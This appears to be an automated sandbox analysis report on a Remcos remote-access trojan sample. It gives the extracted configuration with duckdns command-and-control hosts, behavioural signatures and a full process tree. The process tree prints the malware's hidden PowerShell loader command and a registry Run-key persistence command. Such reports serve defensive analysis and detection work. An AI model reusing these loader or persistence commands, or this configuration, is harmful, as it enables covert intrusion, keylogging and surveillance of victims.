Analysis
max time kernel: 210s
max time network: 210s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/01/2025, 08:47
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://www.sendgb.com/src/download_one.php?uploadId=XRe6kNMAcgW&sc=b29a7fb0f99e7316d6fef858df464c88&file=DOCUMET7887RAMADA%40%23%24%40%21.LZH&private_id=
Resource: win10v2004-20241007-en
General
Malware Config
Extracted: remcos
Sent
haleleeh8iuoty1.duckdns.org:8347
haleleeh8iuoty1.duckdns.org:37830
haleleeh8iuoty2.duckdns.org:8347
haleleeh8iuoty3.duckdns.org:8347
haleleeh8iuoty4.duckdns.org:8347
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: true
install_flag: false
keylog_crypt: false
keylog_file: kmirtup.dat
keylog_flag: false
keylog_path: %AppData%
mouse_option: false
mutex: aksoetuise-Y9DD4X
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
startup_value:
take_screenshot_option: false
take_screenshot_time: 5
Signatures
Remcos family

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run Powershell and hide display window.
pid Process
5096 powershell.exe

Executes dropped EXE (1 IoCs)
pid Process
4232 DOCUMET7887RAMADA@#$@!.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bemixt = "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\\Software\\Genindlggelsen\\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)" reg.exe

Blocklisted process makes network request (7 IoCs)
flow pid Process
67 2436 msiexec.exe
69 2436 msiexec.exe
71 2436 msiexec.exe
73 2436 msiexec.exe
76 2436 msiexec.exe
79 2436 msiexec.exe
81 2436 msiexec.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow ioc
66 drive.google.com
67 drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
pid Process
2436 msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid Process
5096 powershell.exe
2436 msiexec.exe

Drops file in Program Files directory (1 IoCs)
description ioc Process
File opened for modification C:\Program Files (x86)\Common Files\deistic.ini DOCUMET7887RAMADA@#$@!.exe

Drops file in Windows directory (2 IoCs)
description ioc Process
File created C:\Windows\resources\bumpee\Ressourcekrvende.lnk DOCUMET7887RAMADA@#$@!.exe
File opened for modification C:\Windows\Fonts\sluttishly\nonfeverish.tin DOCUMET7887RAMADA@#$@!.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOCUMET7887RAMADA@#$@!.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe

NSIS installer (2 IoCs)
resource yara_rule
behavioral1/files/0x0009000000023c97-132.dat nsis_installer_1
behavioral1/files/0x0009000000023c97-132.dat nsis_installer_2

Enumerates system info in registry (2 TTPs, 3 IoCs)
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe

Modifies registry class (2 IoCs)
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings OpenWith.exe
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings msedge.exe

Modifies registry key (1 TTPs, 1 IoCs)
pid Process
1268 reg.exe

Suspicious behavior: EnumeratesProcesses (22 IoCs)
pid Process
3364 msedge.exe
3364 msedge.exe
4836 msedge.exe
4836 msedge.exe
1760 identity_helper.exe
1760 identity_helper.exe
1908 msedge.exe
1908 msedge.exe
4392 msedge.exe
4392 msedge.exe
4392 msedge.exe
4392 msedge.exe
5096 powershell.exe
5096 powershell.exe
5096 powershell.exe
5096 powershell.exe
5096 powershell.exe
5096 powershell.exe
5096 powershell.exe
5096 powershell.exe
5096 powershell.exe
5096 powershell.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid Process
1096 7zG.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
pid Process
5096 powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (16 IoCs)
pid Process
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe

Suspicious use of AdjustPrivilegeToken (33 IoCs)
description pid Process
Token: SeRestorePrivilege 1624 7zG.exe
Token: 35 1624 7zG.exe
Token: SeSecurityPrivilege 1624 7zG.exe
Token: SeSecurityPrivilege 1624 7zG.exe
Token: SeRestorePrivilege 1420 7zG.exe
Token: 35 1420 7zG.exe
Token: SeSecurityPrivilege 1420 7zG.exe
Token: SeSecurityPrivilege 1420 7zG.exe
Token: SeDebugPrivilege 5096 powershell.exe
Token: SeIncreaseQuotaPrivilege 5096 powershell.exe
Token: SeSecurityPrivilege 5096 powershell.exe
Token: SeTakeOwnershipPrivilege 5096 powershell.exe
Token: SeLoadDriverPrivilege 5096 powershell.exe
Token: SeSystemProfilePrivilege 5096 powershell.exe
Token: SeSystemtimePrivilege 5096 powershell.exe
Token: SeProfSingleProcessPrivilege 5096 powershell.exe
Token: SeIncBasePriorityPrivilege 5096 powershell.exe
Token: SeCreatePagefilePrivilege 5096 powershell.exe
Token: SeBackupPrivilege 5096 powershell.exe
Token: SeRestorePrivilege 5096 powershell.exe
Token: SeShutdownPrivilege 5096 powershell.exe
Token: SeDebugPrivilege 5096 powershell.exe
Token: SeSystemEnvironmentPrivilege 5096 powershell.exe
Token: SeRemoteShutdownPrivilege 5096 powershell.exe
Token: SeUndockPrivilege 5096 powershell.exe
Token: SeManageVolumePrivilege 5096 powershell.exe
Token: 33 5096 powershell.exe
Token: 34 5096 powershell.exe
Token: 35 5096 powershell.exe
Token: 36 5096 powershell.exe
Token: SeRestorePrivilege 1096 7zG.exe
Token: 35 1096 7zG.exe
Token: SeSecurityPrivilege 1096 7zG.exe

Suspicious use of FindShellTrayWindow (37 IoCs)
pid Process
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
1624 7zG.exe
1624 7zG.exe
1420 7zG.exe
1096 7zG.exe

Suspicious use of SendNotifyMessage (24 IoCs)
pid Process
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe
4836 msedge.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
pid Process
3228 OpenWith.exe
2436 msiexec.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4836 wrote to memory of 752 4836 msedge.exe 83 PID 4836 wrote to memory of 752 4836 msedge.exe 83 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 
msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 3364 4836 msedge.exe 85 PID 4836 wrote to memory of 3364 4836 msedge.exe 85 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.sendgb.com/src/download_one.php?uploadId=XRe6kNMAcgW&sc=b29a7fb0f99e7316d6fef858df464c88&file=DOCUMET7887RAMADA%40%23%24%40%21.LZH&private_id=
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 4836
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff409346f8,0x7fff40934708,0x7fff40934718
      PID: 752

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2
      PID: 4656

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
      PID: 3364

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
      PID: 1872

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
      PID: 2256

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
      PID: 5076

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
      PID: 4412

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID: 1760

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
      PID: 2940

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
      PID: 5024

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
      PID: 3544

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
      PID: 2732

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5540 /prefetch:8
      PID: 4384

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
      PID: 4632

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID: 1908

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses
      PID: 4392

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
      PID: 5028

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:1
      PID: 2684

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
      PID: 2420

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=904 /prefetch:1
      PID: 2288

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
      PID: 412

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
      PID: 2488

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:1
      PID: 2972

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
      PID: 4652

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
      PID: 3552

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6484 /prefetch:8
      PID: 2068
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2164

C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 556

C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 4184
C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\" -spe -an -ai#7zMap8703:106:7zEvent9655
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID: 1624

C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!\" -spe -an -ai#7zMap22166:152:7zEvent6322
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID: 1420

C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!\dendropogon.txt
  PID: 4252

C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID: 3228
C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!.exe
  "C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!.exe"
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID: 4232

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Dynamik=GC -raw 'C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla';$balsal=$Dynamik.SubString(57497,3);.$balsal($Dynamik)"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      PID: 5096

        C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\SysWOW64\msiexec.exe"
          - Blocklisted process makes network request
          - Suspicious use of NtCreateThreadExHideFromDebugger
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
          - Suspicious use of SetWindowsHookEx
          PID: 2436

            C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"
              - System Location Discovery: System Language Discovery
              PID: 2352

                C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"
                  - Adds Run key to start application
                  - System Location Discovery: System Language Discovery
                  - Modifies registry key
                  PID: 1268
C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" h -scrcSHA256 -i#7zMap32440:152:7zEvent18347
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID: 1096
MITRE ATT&CK Enterprise v15
Downloads